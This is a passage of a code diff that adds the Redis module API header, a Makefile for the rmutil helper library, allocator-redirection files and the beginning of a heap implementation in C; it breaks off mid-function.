+    RedisModuleTypeMemUsageFunc mem_usage;
+    RedisModuleTypeDigestFunc digest;
+    RedisModuleTypeFreeFunc free;
+} RedisModuleTypeMethods;
+
+#define REDISMODULE_GET_API(name) \
+    RedisModule_GetApi("RedisModule_" #name, ((void **)&RedisModule_ ## name))
+
+#define REDISMODULE_API_FUNC(x) (*x)
+
+
+void *REDISMODULE_API_FUNC(RedisModule_Alloc)(size_t bytes);
+void *REDISMODULE_API_FUNC(RedisModule_Realloc)(void *ptr, size_t bytes);
+void REDISMODULE_API_FUNC(RedisModule_Free)(void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_Calloc)(size_t nmemb, size_t size);
+char *REDISMODULE_API_FUNC(RedisModule_Strdup)(const char *str);
+int REDISMODULE_API_FUNC(RedisModule_GetApi)(const char *, void *);
+int REDISMODULE_API_FUNC(RedisModule_CreateCommand)(RedisModuleCtx *ctx, const char *name, RedisModuleCmdFunc cmdfunc, const char *strflags, int firstkey, int lastkey, int keystep);
+void REDISMODULE_API_FUNC(RedisModule_SetModuleAttribs)(RedisModuleCtx *ctx, const char *name, int ver, int apiver);
+int REDISMODULE_API_FUNC(RedisModule_IsModuleNameBusy)(const char *name);
+int REDISMODULE_API_FUNC(RedisModule_WrongArity)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithLongLong)(RedisModuleCtx *ctx, long long ll);
+int REDISMODULE_API_FUNC(RedisModule_GetSelectedDb)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SelectDb)(RedisModuleCtx *ctx, int newid);
+void *REDISMODULE_API_FUNC(RedisModule_OpenKey)(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode);
+void REDISMODULE_API_FUNC(RedisModule_CloseKey)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_KeyType)(RedisModuleKey *kp);
+size_t REDISMODULE_API_FUNC(RedisModule_ValueLength)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_ListPush)(RedisModuleKey *kp, int where, RedisModuleString *ele);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ListPop)(RedisModuleKey *key, int where);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_Call)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyProto)(RedisModuleCallReply *reply, size_t *len);
+void REDISMODULE_API_FUNC(RedisModule_FreeCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_CallReplyType)(RedisModuleCallReply *reply);
+long long REDISMODULE_API_FUNC(RedisModule_CallReplyInteger)(RedisModuleCallReply *reply);
+size_t REDISMODULE_API_FUNC(RedisModule_CallReplyLength)(RedisModuleCallReply *reply);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_CallReplyArrayElement)(RedisModuleCallReply *reply, size_t idx);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateString)(RedisModuleCtx *ctx, const char *ptr, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromLongLong)(RedisModuleCtx *ctx, long long ll);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromString)(RedisModuleCtx *ctx, const RedisModuleString *str);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringPrintf)(RedisModuleCtx *ctx, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_FreeString)(RedisModuleCtx *ctx, RedisModuleString *str);
+const char *REDISMODULE_API_FUNC(RedisModule_StringPtrLen)(const RedisModuleString *str, size_t *len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithError)(RedisModuleCtx *ctx, const char *err);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithSimpleString)(RedisModuleCtx *ctx, const char *msg);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithArray)(RedisModuleCtx *ctx, long len);
+void REDISMODULE_API_FUNC(RedisModule_ReplySetArrayLength)(RedisModuleCtx *ctx, long len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithStringBuffer)(RedisModuleCtx *ctx, const char *buf, size_t len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithNull)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithDouble)(RedisModuleCtx *ctx, double d);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithCallReply)(RedisModuleCtx *ctx, RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_StringToLongLong)(const RedisModuleString *str, long long *ll);
+int REDISMODULE_API_FUNC(RedisModule_StringToDouble)(const RedisModuleString *str, double *d);
+void REDISMODULE_API_FUNC(RedisModule_AutoMemory)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_Replicate)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_ReplicateVerbatim)(RedisModuleCtx *ctx);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyStringPtr)(RedisModuleCallReply *reply, size_t *len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_DeleteKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_UnlinkKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_StringSet)(RedisModuleKey *key, RedisModuleString *str);
+char *REDISMODULE_API_FUNC(RedisModule_StringDMA)(RedisModuleKey *key, size_t *len, int mode);
+int REDISMODULE_API_FUNC(RedisModule_StringTruncate)(RedisModuleKey *key, size_t newlen);
+mstime_t REDISMODULE_API_FUNC(RedisModule_GetExpire)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_SetExpire)(RedisModuleKey *key, mstime_t expire);
+int REDISMODULE_API_FUNC(RedisModule_ZsetAdd)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr);
+int REDISMODULE_API_FUNC(RedisModule_ZsetIncrby)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr, double *newscore);
+int REDISMODULE_API_FUNC(RedisModule_ZsetScore)(RedisModuleKey *key, RedisModuleString *ele, double *score);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRem)(RedisModuleKey *key, RedisModuleString *ele, int *deleted);
+void REDISMODULE_API_FUNC(RedisModule_ZsetRangeStop)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInScoreRange)(RedisModuleKey *key, double min, double max, int minex, int maxex);
+int REDISMODULE_API_FUNC(RedisModule_ZsetFirstInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+int REDISMODULE_API_FUNC(RedisModule_ZsetLastInLexRange)(RedisModuleKey *key, RedisModuleString *min, RedisModuleString *max);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ZsetRangeCurrentElement)(RedisModuleKey *key, double *score);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeNext)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangePrev)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_ZsetRangeEndReached)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_HashSet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_HashGet)(RedisModuleKey *key, int flags, ...);
+int REDISMODULE_API_FUNC(RedisModule_IsKeysPositionRequest)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_KeyAtPos)(RedisModuleCtx *ctx, int pos);
+unsigned long long REDISMODULE_API_FUNC(RedisModule_GetClientId)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_GetContextFlags)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_PoolAlloc)(RedisModuleCtx *ctx, size_t bytes);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_CreateDataType)(RedisModuleCtx *ctx, const char *name, int encver, RedisModuleTypeMethods *typemethods);
+int REDISMODULE_API_FUNC(RedisModule_ModuleTypeSetValue)(RedisModuleKey *key, RedisModuleType *mt, void *value);
+RedisModuleType *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetType)(RedisModuleKey *key);
+void *REDISMODULE_API_FUNC(RedisModule_ModuleTypeGetValue)(RedisModuleKey *key);
+void REDISMODULE_API_FUNC(RedisModule_SaveUnsigned)(RedisModuleIO *io, uint64_t value);
+uint64_t REDISMODULE_API_FUNC(RedisModule_LoadUnsigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveSigned)(RedisModuleIO *io, int64_t value);
+int64_t REDISMODULE_API_FUNC(RedisModule_LoadSigned)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_EmitAOF)(RedisModuleIO *io, const char *cmdname, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_SaveString)(RedisModuleIO *io, RedisModuleString *s);
+void REDISMODULE_API_FUNC(RedisModule_SaveStringBuffer)(RedisModuleIO *io, const char *str, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_LoadString)(RedisModuleIO *io);
+char *REDISMODULE_API_FUNC(RedisModule_LoadStringBuffer)(RedisModuleIO *io, size_t *lenptr);
+void REDISMODULE_API_FUNC(RedisModule_SaveDouble)(RedisModuleIO *io, double value);
+double REDISMODULE_API_FUNC(RedisModule_LoadDouble)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_SaveFloat)(RedisModuleIO *io, float value);
+float REDISMODULE_API_FUNC(RedisModule_LoadFloat)(RedisModuleIO *io);
+void REDISMODULE_API_FUNC(RedisModule_Log)(RedisModuleCtx *ctx, const char *level, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_LogIOError)(RedisModuleIO *io, const char *levelstr, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_StringAppendBuffer)(RedisModuleCtx *ctx, RedisModuleString *str, const char *buf, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_RetainString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_StringCompare)(RedisModuleString *a, RedisModuleString *b);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetContextFromIO)(RedisModuleIO *io);
+long long REDISMODULE_API_FUNC(RedisModule_Milliseconds)(void);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddStringBuffer)(RedisModuleDigest *md, unsigned char *ele, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_DigestAddLongLong)(RedisModuleDigest *md, long long ele);
+void REDISMODULE_API_FUNC(RedisModule_DigestEndSequence)(RedisModuleDigest *md);
+RedisModuleDict *REDISMODULE_API_FUNC(RedisModule_CreateDict)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_FreeDict)(RedisModuleCtx *ctx, RedisModuleDict *d);
+uint64_t REDISMODULE_API_FUNC(RedisModule_DictSize)(RedisModuleDict *d);
+int REDISMODULE_API_FUNC(RedisModule_DictSetC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplaceC)(RedisModuleDict *d, void *key, size_t keylen, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictSet)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+int REDISMODULE_API_FUNC(RedisModule_DictReplace)(RedisModuleDict *d, RedisModuleString *key, void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictGetC)(RedisModuleDict *d, void *key, size_t keylen, int *nokey);
+void *REDISMODULE_API_FUNC(RedisModule_DictGet)(RedisModuleDict *d, RedisModuleString *key, int *nokey);
+int REDISMODULE_API_FUNC(RedisModule_DictDelC)(RedisModuleDict *d, void *key, size_t keylen, void *oldval);
+int REDISMODULE_API_FUNC(RedisModule_DictDel)(RedisModuleDict *d, RedisModuleString *key, void *oldval);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStartC)(RedisModuleDict *d, const char *op, void *key, size_t keylen);
+RedisModuleDictIter *REDISMODULE_API_FUNC(RedisModule_DictIteratorStart)(RedisModuleDict *d, const char *op, RedisModuleString *key);
+void REDISMODULE_API_FUNC(RedisModule_DictIteratorStop)(RedisModuleDictIter *di);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseekC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictIteratorReseek)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+void *REDISMODULE_API_FUNC(RedisModule_DictNextC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+void *REDISMODULE_API_FUNC(RedisModule_DictPrevC)(RedisModuleDictIter *di, size_t *keylen, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictNext)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_DictPrev)(RedisModuleCtx *ctx, RedisModuleDictIter *di, void **dataptr);
+int REDISMODULE_API_FUNC(RedisModule_DictCompareC)(RedisModuleDictIter *di, const char *op, void *key, size_t keylen);
+int REDISMODULE_API_FUNC(RedisModule_DictCompare)(RedisModuleDictIter *di, const char *op, RedisModuleString *key);
+
+/* Experimental APIs */
+#ifdef REDISMODULE_EXPERIMENTAL_API
+#define REDISMODULE_EXPERIMENTAL_API_VERSION 3
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_BlockClient)(RedisModuleCtx *ctx, RedisModuleCmdFunc reply_callback, RedisModuleCmdFunc timeout_callback, void (*free_privdata)(RedisModuleCtx*,void*), long long timeout_ms);
+int REDISMODULE_API_FUNC(RedisModule_UnblockClient)(RedisModuleBlockedClient *bc, void *privdata);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedReplyRequest)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_IsBlockedTimeoutRequest)(RedisModuleCtx *ctx);
+void *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientPrivateData)(RedisModuleCtx *ctx);
+RedisModuleBlockedClient *REDISMODULE_API_FUNC(RedisModule_GetBlockedClientHandle)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_AbortBlock)(RedisModuleBlockedClient *bc);
+RedisModuleCtx *REDISMODULE_API_FUNC(RedisModule_GetThreadSafeContext)(RedisModuleBlockedClient *bc);
+void REDISMODULE_API_FUNC(RedisModule_FreeThreadSafeContext)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextLock)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_ThreadSafeContextUnlock)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SubscribeToKeyspaceEvents)(RedisModuleCtx *ctx, int types, RedisModuleNotificationFunc cb);
+int REDISMODULE_API_FUNC(RedisModule_BlockedClientDisconnected)(RedisModuleCtx *ctx);
+void REDISMODULE_API_FUNC(RedisModule_RegisterClusterMessageReceiver)(RedisModuleCtx *ctx, uint8_t type, RedisModuleClusterMessageReceiver callback);
+int REDISMODULE_API_FUNC(RedisModule_SendClusterMessage)(RedisModuleCtx *ctx, char *target_id, uint8_t type, unsigned char *msg, uint32_t len);
+int REDISMODULE_API_FUNC(RedisModule_GetClusterNodeInfo)(RedisModuleCtx *ctx, const char *id, char *ip, char *master_id, int *port, int *flags);
+char **REDISMODULE_API_FUNC(RedisModule_GetClusterNodesList)(RedisModuleCtx *ctx, size_t *numnodes);
+void REDISMODULE_API_FUNC(RedisModule_FreeClusterNodesList)(char **ids);
+RedisModuleTimerID REDISMODULE_API_FUNC(RedisModule_CreateTimer)(RedisModuleCtx *ctx, mstime_t period, RedisModuleTimerProc callback, void *data);
+int REDISMODULE_API_FUNC(RedisModule_StopTimer)(RedisModuleCtx *ctx, RedisModuleTimerID id, void **data);
+int REDISMODULE_API_FUNC(RedisModule_GetTimerInfo)(RedisModuleCtx *ctx, RedisModuleTimerID id, uint64_t *remaining, void **data);
+const char *REDISMODULE_API_FUNC(RedisModule_GetMyClusterID)(void);
+size_t REDISMODULE_API_FUNC(RedisModule_GetClusterSize)(void);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomBytes)(unsigned char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_GetRandomHexChars)(char *dst, size_t len);
+void REDISMODULE_API_FUNC(RedisModule_SetDisconnectCallback)(RedisModuleBlockedClient *bc, RedisModuleDisconnectFunc callback);
+void REDISMODULE_API_FUNC(RedisModule_SetClusterFlags)(RedisModuleCtx *ctx, uint64_t flags);
+#endif
+
+/* This is included inline inside each Redis module. */
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) __attribute__((unused));
+static int RedisModule_Init(RedisModuleCtx *ctx, const char *name, int ver, int apiver) {
+    void *getapifuncptr = ((void**)ctx)[0];
+    RedisModule_GetApi = (int (*)(const char *, void *)) (unsigned long)getapifuncptr;
+    REDISMODULE_GET_API(Alloc);
+    REDISMODULE_GET_API(Calloc);
+    REDISMODULE_GET_API(Free);
+    REDISMODULE_GET_API(Realloc);
+    REDISMODULE_GET_API(Strdup);
+    REDISMODULE_GET_API(CreateCommand);
+    REDISMODULE_GET_API(SetModuleAttribs);
+    REDISMODULE_GET_API(IsModuleNameBusy);
+    REDISMODULE_GET_API(WrongArity);
+    REDISMODULE_GET_API(ReplyWithLongLong);
+    REDISMODULE_GET_API(ReplyWithError);
+    REDISMODULE_GET_API(ReplyWithSimpleString);
+    REDISMODULE_GET_API(ReplyWithArray);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(ReplyWithStringBuffer);
+    REDISMODULE_GET_API(ReplyWithString);
+    REDISMODULE_GET_API(ReplyWithNull);
+    REDISMODULE_GET_API(ReplyWithCallReply);
+    REDISMODULE_GET_API(ReplyWithDouble);
+    REDISMODULE_GET_API(ReplySetArrayLength);
+    REDISMODULE_GET_API(GetSelectedDb);
+    REDISMODULE_GET_API(SelectDb);
+    REDISMODULE_GET_API(OpenKey);
+    REDISMODULE_GET_API(CloseKey);
+    REDISMODULE_GET_API(KeyType);
+    REDISMODULE_GET_API(ValueLength);
+    REDISMODULE_GET_API(ListPush);
+    REDISMODULE_GET_API(ListPop);
+    REDISMODULE_GET_API(StringToLongLong);
+    REDISMODULE_GET_API(StringToDouble);
+    REDISMODULE_GET_API(Call);
+    REDISMODULE_GET_API(CallReplyProto);
+    REDISMODULE_GET_API(FreeCallReply);
+    REDISMODULE_GET_API(CallReplyInteger);
+    REDISMODULE_GET_API(CallReplyType);
+    REDISMODULE_GET_API(CallReplyLength);
+    REDISMODULE_GET_API(CallReplyArrayElement);
+    REDISMODULE_GET_API(CallReplyStringPtr);
+    REDISMODULE_GET_API(CreateStringFromCallReply);
+    REDISMODULE_GET_API(CreateString);
+    REDISMODULE_GET_API(CreateStringFromLongLong);
+    REDISMODULE_GET_API(CreateStringFromString);
+    REDISMODULE_GET_API(CreateStringPrintf);
+    REDISMODULE_GET_API(FreeString);
+    REDISMODULE_GET_API(StringPtrLen);
+    REDISMODULE_GET_API(AutoMemory);
+    REDISMODULE_GET_API(Replicate);
+    REDISMODULE_GET_API(ReplicateVerbatim);
+    REDISMODULE_GET_API(DeleteKey);
+    REDISMODULE_GET_API(UnlinkKey);
+    REDISMODULE_GET_API(StringSet);
+    REDISMODULE_GET_API(StringDMA);
+    REDISMODULE_GET_API(StringTruncate);
+    REDISMODULE_GET_API(GetExpire);
+    REDISMODULE_GET_API(SetExpire);
+    REDISMODULE_GET_API(ZsetAdd);
+    REDISMODULE_GET_API(ZsetIncrby);
+    REDISMODULE_GET_API(ZsetScore);
+    REDISMODULE_GET_API(ZsetRem);
+    REDISMODULE_GET_API(ZsetRangeStop);
+    REDISMODULE_GET_API(ZsetFirstInScoreRange);
+    REDISMODULE_GET_API(ZsetLastInScoreRange);
+    REDISMODULE_GET_API(ZsetFirstInLexRange);
+    REDISMODULE_GET_API(ZsetLastInLexRange);
+    REDISMODULE_GET_API(ZsetRangeCurrentElement);
+    REDISMODULE_GET_API(ZsetRangeNext);
+    REDISMODULE_GET_API(ZsetRangePrev);
+    REDISMODULE_GET_API(ZsetRangeEndReached);
+    REDISMODULE_GET_API(HashSet);
+    REDISMODULE_GET_API(HashGet);
+    REDISMODULE_GET_API(IsKeysPositionRequest);
+    REDISMODULE_GET_API(KeyAtPos);
+    REDISMODULE_GET_API(GetClientId);
+    REDISMODULE_GET_API(GetContextFlags);
+    REDISMODULE_GET_API(PoolAlloc);
+    REDISMODULE_GET_API(CreateDataType);
+    REDISMODULE_GET_API(ModuleTypeSetValue);
+    REDISMODULE_GET_API(ModuleTypeGetType);
+    REDISMODULE_GET_API(ModuleTypeGetValue);
+    REDISMODULE_GET_API(SaveUnsigned);
+    REDISMODULE_GET_API(LoadUnsigned);
+    REDISMODULE_GET_API(SaveSigned);
+    REDISMODULE_GET_API(LoadSigned);
+    REDISMODULE_GET_API(SaveString);
+    REDISMODULE_GET_API(SaveStringBuffer);
+    REDISMODULE_GET_API(LoadString);
+    REDISMODULE_GET_API(LoadStringBuffer);
+    REDISMODULE_GET_API(SaveDouble);
+    REDISMODULE_GET_API(LoadDouble);
+    REDISMODULE_GET_API(SaveFloat);
+    REDISMODULE_GET_API(LoadFloat);
+    REDISMODULE_GET_API(EmitAOF);
+    REDISMODULE_GET_API(Log);
+    REDISMODULE_GET_API(LogIOError);
+    REDISMODULE_GET_API(StringAppendBuffer);
+    REDISMODULE_GET_API(RetainString);
+    REDISMODULE_GET_API(StringCompare);
+    REDISMODULE_GET_API(GetContextFromIO);
+    REDISMODULE_GET_API(Milliseconds);
+    REDISMODULE_GET_API(DigestAddStringBuffer);
+    REDISMODULE_GET_API(DigestAddLongLong);
+    REDISMODULE_GET_API(DigestEndSequence);
+    REDISMODULE_GET_API(CreateDict);
+    REDISMODULE_GET_API(FreeDict);
+    REDISMODULE_GET_API(DictSize);
+    REDISMODULE_GET_API(DictSetC);
+    REDISMODULE_GET_API(DictReplaceC);
+    REDISMODULE_GET_API(DictSet);
+    REDISMODULE_GET_API(DictReplace);
+    REDISMODULE_GET_API(DictGetC);
+    REDISMODULE_GET_API(DictGet);
+    REDISMODULE_GET_API(DictDelC);
+    REDISMODULE_GET_API(DictDel);
+    REDISMODULE_GET_API(DictIteratorStartC);
+    REDISMODULE_GET_API(DictIteratorStart);
+    REDISMODULE_GET_API(DictIteratorStop);
+    REDISMODULE_GET_API(DictIteratorReseekC);
+    REDISMODULE_GET_API(DictIteratorReseek);
+    REDISMODULE_GET_API(DictNextC);
+    REDISMODULE_GET_API(DictPrevC);
+    REDISMODULE_GET_API(DictNext);
+    REDISMODULE_GET_API(DictPrev);
+    REDISMODULE_GET_API(DictCompare);
+    REDISMODULE_GET_API(DictCompareC);
+
+#ifdef REDISMODULE_EXPERIMENTAL_API
+    REDISMODULE_GET_API(GetThreadSafeContext);
+    REDISMODULE_GET_API(FreeThreadSafeContext);
+    REDISMODULE_GET_API(ThreadSafeContextLock);
+    REDISMODULE_GET_API(ThreadSafeContextUnlock);
+    REDISMODULE_GET_API(BlockClient);
+    REDISMODULE_GET_API(UnblockClient);
+    REDISMODULE_GET_API(IsBlockedReplyRequest);
+    REDISMODULE_GET_API(IsBlockedTimeoutRequest);
+    REDISMODULE_GET_API(GetBlockedClientPrivateData);
+    REDISMODULE_GET_API(GetBlockedClientHandle);
+    REDISMODULE_GET_API(AbortBlock);
+    REDISMODULE_GET_API(SetDisconnectCallback);
+    REDISMODULE_GET_API(SubscribeToKeyspaceEvents);
+    REDISMODULE_GET_API(BlockedClientDisconnected);
+    REDISMODULE_GET_API(RegisterClusterMessageReceiver);
+    REDISMODULE_GET_API(SendClusterMessage);
+    REDISMODULE_GET_API(GetClusterNodeInfo);
+    REDISMODULE_GET_API(GetClusterNodesList);
+    REDISMODULE_GET_API(FreeClusterNodesList);
+    REDISMODULE_GET_API(CreateTimer);
+    REDISMODULE_GET_API(StopTimer);
+    REDISMODULE_GET_API(GetTimerInfo);
+    REDISMODULE_GET_API(GetMyClusterID);
+    REDISMODULE_GET_API(GetClusterSize);
+    REDISMODULE_GET_API(GetRandomBytes);
+    REDISMODULE_GET_API(GetRandomHexChars);
+    REDISMODULE_GET_API(SetClusterFlags);
+#endif
+
+    if (RedisModule_IsModuleNameBusy && RedisModule_IsModuleNameBusy(name)) return REDISMODULE_ERR;
+    RedisModule_SetModuleAttribs(ctx,name,ver,apiver);
+    return REDISMODULE_OK;
+}
+
+#else
+
+/* Things only defined for the modules core, not exported to modules
+ * including this file. */
+#define RedisModuleString robj
+
+#endif /* REDISMODULE_CORE */
+#endif /* REDISMOUDLE_H */
@@ -0,0 +1,31 @@
+# set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+CFLAGS ?= -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function
+CFLAGS += -I$(RM_INCLUDE_DIR)
+CC=gcc
+
+OBJS=util.o strings.o sds.o vector.o alloc.o periodic.o
+
+all: librmutil.a
+
+clean:
+	rm -rf *.o *.a
+
+librmutil.a: $(OBJS)
+	ar rcs $@ $^
+
+test_vector: test_vector.o vector.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_vector
+
+test_periodic: test_periodic.o periodic.o
+	$(CC) -Wall -o $@ $^ -lc -lpthread -O0
+	@(sh -c ./$@)
+.PHONY: test_periodic
+	
+test: test_periodic test_vector
+.PHONY: test
@@ -0,0 +1,32 @@
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include "alloc.h"
+
+/* A patched implementation of strdup that will use our patched calloc */
+char *rmalloc_strndup(const char *s, size_t n) {
+  char *ret = calloc(n + 1, sizeof(char));
+  if (ret)
+    memcpy(ret, s, n);
+  return ret;
+}
+
+/*
+ * Re-patching RedisModule_Alloc and friends to the original malloc functions
+ *
+ * This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main().
+ *
+ * Since including "alloc.h" while defining REDIS_MODULE_TARGET
+ * replaces all malloc functions in redis with the RM_Alloc family of functions,
+ * when running that code outside of redis, your app will crash. This function
+ * patches the RM_Alloc functions back to the original mallocs. */
+void RMUTil_InitAlloc() {
+
+  RedisModule_Alloc = malloc;
+  RedisModule_Realloc = realloc;
+  RedisModule_Calloc = calloc;
+  RedisModule_Free = free;
+  RedisModule_Strdup = strdup;
+}
@@ -0,0 +1,51 @@
+#ifndef __RMUTIL_ALLOC__
+#define __RMUTIL_ALLOC__
+
+/* Automatic Redis Module Allocation functions monkey-patching.
+ *
+ * Including this file while REDIS_MODULE_TARGET is defined, will explicitly
+ * override malloc, calloc, realloc & free with RedisModule_Alloc,
+ * RedisModule_Callc, etc implementations, that allow Redis better control and
+ * reporting over allocations per module.
+ *
+ * You should include this file in all c files AS THE LAST INCLUDED FILE
+ *
+ * This only has effect when when compiling with the macro REDIS_MODULE_TARGET
+ * defined. The idea is that for unit tests it will not be defined, but for the
+ * module build target it will be.
+ *
+ */
+
+#include <stdlib.h>
+#include <redismodule.h>
+
+char *rmalloc_strndup(const char *s, size_t n);
+
+#ifdef REDIS_MODULE_TARGET /* Set this when compiling your code as a module */
+
+#define malloc(size) RedisModule_Alloc(size)
+#define calloc(count, size) RedisModule_Calloc(count, size)
+#define realloc(ptr, size) RedisModule_Realloc(ptr, size)
+#define free(ptr) RedisModule_Free(ptr)
+
+#ifdef strdup
+#undef strdup
+#endif
+#define strdup(ptr) RedisModule_Strdup(ptr)
+
+/* More overriding */
+// needed to avoid calling strndup->malloc
+#ifdef strndup
+#undef strndup
+#endif
+#define strndup(s, n) rmalloc_strndup(s, n)
+
+#else
+
+#endif /* REDIS_MODULE_TARGET */
+/* This function should be called if you are working with malloc-patched code
+ * outside of redis, usually for unit tests. Call it once when entering your unit
+ * tests' main() */
+void RMUTil_InitAlloc();
+
+#endif /* __RMUTIL_ALLOC__ */
@@ -0,0 +1,107 @@
+#include "heap.h"
+
+/* Byte-wise swap two items of size SIZE. */
+#define SWAP(a, b, size)                      \
+  do                                          \
+    {                                         \
+      register size_t __size = (size);        \
+      register char *__a = (a), *__b = (b);   \
+      do                                      \
+        {                                     \
+          char __tmp = *__a;                  \
+          *__a++ = *__b;                      \
+          *__b++ = __tmp;                     \
+        } while (--__size > 0);               \
+    } while (0)
+
+inline char *__vector_GetPtr(Vector *v, size_t pos) {
+    return v->data + (pos * v->elemSize);
+}
+
+void __sift_up(Vector *v, size_t first, size_t last, int (*cmp)(void *, void *)) {
+    size_t len = last - first;
+    if (len > 1) {
+        len = (len - 2) / 2;
+        size_t ptr = first + len;
+        if (cmp(__vector_GetPtr(v, ptr), __vector_GetPtr(v, --last)) < 0) {
+            char t[v->elemSize];
+            memcpy(t, __vector_GetPtr(v, last), v->elemSize);
+            do {
+                memcpy(__vector_GetPtr(v, last), __vector_GetPtr(v, ptr), v->elemSize);
+                last = ptr;
+                if (len == 0)
+                    break;
+                len = (len - 1) / 2;
+                ptr = first + len;
